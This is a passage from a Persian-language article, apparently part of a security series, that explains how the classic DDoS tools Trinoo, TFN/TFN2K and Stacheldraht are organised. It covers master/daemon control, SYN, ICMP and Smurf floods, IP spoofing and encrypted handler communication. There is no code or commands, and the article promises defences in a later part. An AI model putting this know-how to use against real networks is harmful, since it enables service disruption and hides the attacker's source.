شوند. یک ارباب می تواند چند شیطان را کنترل کند. شیاطین میزبانان هک شده ای هستند که طغیان UDP اصلی را روی ماشین قربانی انجام می دهند. مرحله۳: حمله DDoS هنگامی که حمله کننده فرمانی به میزبانان Master ارسال می کند، انجام می گیرد. این اربابان به هر شیطانی دستور می دهند که حمله DoS را علیه آدرس IP مشخص شده در فرمان آغاز کنند و با انجام تعداد زیادی حمله DoS یک حمله DDoS شکل می گیرد. TFN/TFN2K TFN (Tribal Flood Network) یا شبکه طغیان قبیله ای، مانند Trinoo، در اصل یک حمله Master/Slave است که در آن برای طغیان SYN علیه سیستم قربانی هماهنگی صورت می گیرد. شیاطین TFN قادر به انجام حملات بسیار متنوع تری شامل طغیان ICMP، طغیان SYN و حملات Smurf هستند، بنابراین TFN از حمله Trinoo پیچیده تر است. TFN2K نسبت به ابزار TFN اصلی چندین برتری و پیشرفت دارد. حملات TFN2K با استفاده از جعل آدرس های IP اجرا می شوند که باعث کشف مشکل تر منبع حمله می شود. حملات TFN2K فقط طغیان ساده مانند TFN نیستند. آنها همچنین شامل حملاتی می شوند که از شکاف های امنیتی سیستم عامل ها برای بسته های نامعتبر و ناقص سوءاستفاده می کنند تا به این ترتیب باعث از کار افتادن سیستم های قربانی شوند. حمله کنندگان TFN2K دیگر نیازی به اجرای فرمان ها با وارد شدن به ماشین های مخدوم (Client) )به جای Master در TFN) ندارند و می توانند این فرمان ها را از راه دور اجراء کنند. ارتباط بین Clientها و Daemonها دیگر به پاسخ های اکوی ICMP محدود نمی شود و می تواند روی واسط های مختلفی مانند TCP و UDP صورت گیرد. بنابراین TFN2K خطرناک تر و همچنین برای کشف کردن مشکل تر است. Stacheldraht کد Stacheldraht بسیار شبیه به Trinoo و TFN است، اما Stacheldraht اجازه می دهد که ارتباط بین حمله کننده و Masterها (که در این حمله Handler نامیده می شوند) رمزنگاری شود؛ عامل ها می توانند کد خود را بصورت خودکار ارتقاء دهند، می توانند اقدام به انواع مختلفی از حملات مانند طغیان های ICMP، طغیان های UDP و طغیان های SYN کنند. در مقاله بعدی به روشهای مقابله با این نوع حملات خواهیم پرداخت.